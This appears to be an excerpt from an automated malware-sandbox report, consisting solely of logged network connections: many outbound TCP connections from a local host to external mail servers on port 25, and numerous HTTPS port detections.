                  Source: global trafficTCP traffic: 192.168.2.6:52880 -> 198.54.117.242:25
                  Source: global trafficTCP traffic: 192.168.2.6:53862 -> 87.248.97.36:25
                  Source: global trafficTCP traffic: 192.168.2.6:54005 -> 66.226.70.66:25
                  Source: global trafficTCP traffic: 192.168.2.6:54998 -> 153.126.211.112:25
                  Source: global trafficTCP traffic: 192.168.2.6:55041 -> 154.213.117.166:25
                  Source: global trafficTCP traffic: 192.168.2.6:55047 -> 199.59.243.223:25
                  Source: global trafficTCP traffic: 192.168.2.6:55056 -> 91.216.241.100:25
                  Source: global trafficTCP traffic: 192.168.2.6:55057 -> 15.197.142.173:25
                  Source: global trafficTCP traffic: 192.168.2.6:55066 -> 104.21.235.31:25
                  Source: global trafficTCP traffic: 192.168.2.6:55328 -> 46.19.218.80:25
                  Source: global trafficTCP traffic: 192.168.2.6:55774 -> 165.160.15.20:25
                  Source: global trafficTCP traffic: 192.168.2.6:55899 -> 217.19.254.22:25
                  Source: global trafficTCP traffic: 192.168.2.6:57414 -> 35.172.94.1:25
                  Source: global trafficTCP traffic: 192.168.2.6:57446 -> 13.248.169.48:25
                  Source: global trafficTCP traffic: 192.168.2.6:57863 -> 54.209.32.212:25
                  Source: global trafficTCP traffic: 192.168.2.6:59808 -> 178.249.70.75:25
                  Source: global trafficTCP traffic: 192.168.2.6:64440 -> 34.224.10.110:25
                  Source: global trafficTCP traffic: 192.168.2.6:64467 -> 23.239.201.14:25
                  Source: global trafficTCP traffic: 192.168.2.6:64470 -> 174.129.25.170:25
                  Source: global trafficTCP traffic: 192.168.2.6:64471 -> 216.239.34.21:25
                  Source: global trafficTCP traffic: 192.168.2.6:64478 -> 51.159.3.117:25
                  Source: global trafficTCP traffic: 192.168.2.6:64481 -> 54.212.145.129:25
                  Source: global trafficTCP traffic: 192.168.2.6:64521 -> 164.132.175.106:25
                  Source: global trafficTCP traffic: 192.168.2.6:64523 -> 27.0.174.59:25
                  Source: global trafficTCP traffic: 192.168.2.6:64537 -> 34.102.136.180:25
                  Source: global trafficTCP traffic: 192.168.2.6:64538 -> 47.91.167.60:25
                  Source: global trafficTCP traffic: 192.168.2.6:64588 -> 43.246.117.171:25
                  Source: global trafficTCP traffic: 192.168.2.6:65229 -> 198.49.23.145:25
                  Source: global trafficTCP traffic: 192.168.2.6:65230 -> 62.122.170.171:25
                  Source: global trafficTCP traffic: 192.168.2.6:65236 -> 54.39.198.18:25
                  Source: global trafficTCP traffic: 192.168.2.6:65237 -> 69.195.90.46:25
                  Source: global trafficTCP traffic: 192.168.2.6:65239 -> 76.223.35.103:25
                  Source: global trafficTCP traffic: 192.168.2.6:65268 -> 164.92.82.47:25
                  Source: global trafficTCP traffic: 192.168.2.6:65270 -> 77.78.104.3:25
                  Source: global trafficTCP traffic: 192.168.2.6:65384 -> 185.253.212.22:25
                  Source: global trafficTCP traffic: 192.168.2.6:65479 -> 151.101.2.132:25
                  Source: global trafficTCP traffic: 192.168.2.6:65532 -> 153.122.24.177:25
                  Source: global trafficTCP traffic: 192.168.2.6:1050 -> 77.72.4.226:25
                  Source: global trafficTCP traffic: 192.168.2.6:1051 -> 162.241.233.114:25
                  Source: global trafficTCP traffic: 192.168.2.6:1089 -> 15.197.204.56:25
                  Source: global trafficTCP traffic: 192.168.2.6:1219 -> 38.111.255.201:25
                  Source: global trafficTCP traffic: 192.168.2.6:1248 -> 92.204.129.113:25
                  Source: global trafficTCP traffic: 192.168.2.6:5318 -> 104.26.0.82:25
                  Source: global trafficTCP traffic: 192.168.2.6:5441 -> 198.49.23.144:25
                  Source: global trafficTCP traffic: 192.168.2.6:5617 -> 173.231.184.124:25
                  Source: global trafficTCP traffic: 192.168.2.6:5628 -> 199.34.228.78:25
                  Source: global trafficTCP traffic: 192.168.2.6:5795 -> 219.94.128.87:25
                  Source: global trafficTCP traffic: 192.168.2.6:6019 -> 103.112.69.92:25
                  Source: global trafficTCP traffic: 192.168.2.6:6057 -> 202.53.77.146:25
                  Source: global trafficTCP traffic: 192.168.2.6:7622 -> 43.255.29.192:25
                  Source: global trafficTCP traffic: 192.168.2.6:7749 -> 5.39.75.157:25
                  Source: global trafficTCP traffic: 192.168.2.6:9060 -> 35.154.163.204:25
                  Source: global trafficTCP traffic: 192.168.2.6:9263 -> 76.74.184.61:25
                  Source: global trafficTCP traffic: 192.168.2.6:9285 -> 136.243.147.81:25
                  Source: global trafficTCP traffic: 192.168.2.6:10690 -> 79.96.32.254:25
                  Source: global trafficTCP traffic: 192.168.2.6:10692 -> 216.69.141.67:25
                  Source: global trafficTCP traffic: 192.168.2.6:10695 -> 51.89.6.56:25
                  Source: global trafficTCP traffic: 192.168.2.6:10900 -> 103.4.16.43:25
                  Source: global trafficTCP traffic: 192.168.2.6:11856 -> 3.130.253.23:25
                  Source: global trafficTCP traffic: 192.168.2.6:13652 -> 3.140.13.188:25
                  Source: global trafficTCP traffic: 192.168.2.6:14041 -> 195.128.140.29:25
                  Source: global trafficTCP traffic: 192.168.2.6:15788 -> 35.186.238.101:25
                  Source: global trafficTCP traffic: 192.168.2.6:17339 -> 59.106.13.169:25
                  Source: global trafficTCP traffic: 192.168.2.6:17375 -> 3.19.116.195:25
                  Source: global trafficTCP traffic: 192.168.2.6:17422 -> 216.177.137.32:25
                  Source: global trafficTCP traffic: 192.168.2.6:17949 -> 54.161.222.85:25
                  Source: global trafficTCP traffic: 192.168.2.6:18385 -> 93.187.206.66:25
                  Source: global trafficTCP traffic: 192.168.2.6:18427 -> 35.169.15.168:25
                  Source: global trafficTCP traffic: 192.168.2.6:18467 -> 5.134.4.115:25
                  Source: global trafficTCP traffic: 192.168.2.6:18864 -> 45.142.176.225:25
                  Source: global trafficTCP traffic: 192.168.2.6:19267 -> 107.180.58.31:25
                  Source: global trafficTCP traffic: 192.168.2.6:19483 -> 185.178.208.141:25
                  Source: global trafficTCP traffic: 192.168.2.6:19529 -> 89.161.136.188:25
                  Source: global trafficTCP traffic: 192.168.2.6:19545 -> 72.251.233.245:25
                  Source: global trafficTCP traffic: 192.168.2.6:19551 -> 148.72.176.26:25
                  Source: global trafficTCP traffic: 192.168.2.6:19554 -> 128.204.134.138:25
                  Source: global trafficTCP traffic: 192.168.2.6:19700 -> 208.100.26.245:25
                  Source: global trafficTCP traffic: 192.168.2.6:20068 -> 202.172.28.89:25
                  Source: global trafficTCP traffic: 192.168.2.6:20097 -> 64.18.191.61:25
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62435 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7750 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16820
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16815
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3399 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16816
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16817
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16818
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16525 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16811
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16812
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16814
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52633 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16819
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16830
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16831
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63773 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4231 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 12175 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16832
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16826
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59253 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16827
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13018 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16829
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16822
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16823
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16824
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5568 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13488 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 6436 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16549 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14332 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4255 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9918 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50439 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63303 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61122 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61592 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62411 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16810
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51789 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16805
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1194 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16806
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16807
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 17863 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16801
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16802
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16803
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2086 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16809
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62460 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16862
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16863
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16864
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16865
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60229 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 17887 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16860
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63797 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16861
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16859
                  Source: unknownNetwork traffic detected: HTTP traffic on port 15657 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 18731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16550 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16855
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16856
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5123 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16857
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16858
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2037 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7774 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 17417 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16873
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16874
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16875
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16876
                  Source: unknownNetwork traffic detected: HTTP traffic on port 11283 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16871
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62459 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16872
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16501 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16866
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16867
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57047 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16868
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16869
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14381 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14790 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4280 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 8617 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63327 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9943 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16840
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16842
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16843
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61543 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16837
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59277 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3351 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 15633 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16838
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16839
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16833
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16835
                  Source: unknownNetwork traffic detected: HTTP traffic on port 12151 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16836
                  Source: unknownNetwork traffic detected: HTTP traffic on port 51307 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5520 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13464 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16851
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7304 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16852
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16853
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4279 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16854
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5593 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16850
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16848
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16849
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16844
                  Source: unknownNetwork traffic detected: HTTP traffic on port 17814 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16845
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14789 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16846
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16847
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4206 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54863 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61146 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13440 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 19611 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5147 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 65521 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57023 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16899
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60675 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 63700 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 12102 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3326 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13067 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 12126 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16574 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50885 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51207
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51205
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51209
                  Source: unknownNetwork traffic detected: HTTP traffic on port 6461 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16884
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16885
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16886
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16887
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51203
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16880
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16881
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51201
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16882
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16883
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50861 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16877
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16878
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55731 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4652 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9522 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53525 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62484 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51219
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51217
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16890
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16895
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51211
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16896
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16971 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14765 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16897
                  Source: unknownNetwork traffic detected: HTTP traffic on port 6857 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16898
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
                  Source: unknownNetwork traffic detected: HTTP traffic on port 15261 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16891
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51215
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16893
                  Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51213
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16894
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 16889
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2013 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5544 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60651 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 15285 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14741 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 18310 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13043 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55299 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10391 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 18309 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 19635 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61567 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 62881 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 3302 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53501 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5172 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59649 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 4627 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16995 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64207 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 58312 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61171 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64604 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 7798 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16598 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 6485 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13439 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 14356 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50488 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61964 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 18706 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 11209 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51144
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51145
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51142
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51143
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51148
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51149
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51146
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51147
                  Source: unknownNetwork traffic detected: HTTP traffic on port 5941 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51151
                  Source: unknownNetwork traffic detected: HTTP traffic on port 13861 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51152
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53598 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 60626 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10366 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 65089 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64256 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 11210 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51155
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51156
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51153
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51154
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51159
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51157
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51158
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9571 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 6064 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 54442 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51162
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51163
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51160
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51161
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 64232 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 56635 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 10342 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51167
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51165
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51169
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 6040 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51173
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51174
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51171
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51172
                  Source: unknownNetwork traffic detected: HTTP traffic on port 19684 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 59625 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 2938 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 16153 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9101 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 57444 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51177
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51178
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51175
                  Source: unknownNetwork traffic detected: HTTP traffic on port 53104 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 61195 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51179
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51180
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51181
                  Source: unknownNetwork traffic detected: HTTP traffic on port 6039 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 1121 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51184
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51185
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51182
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51183
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51108
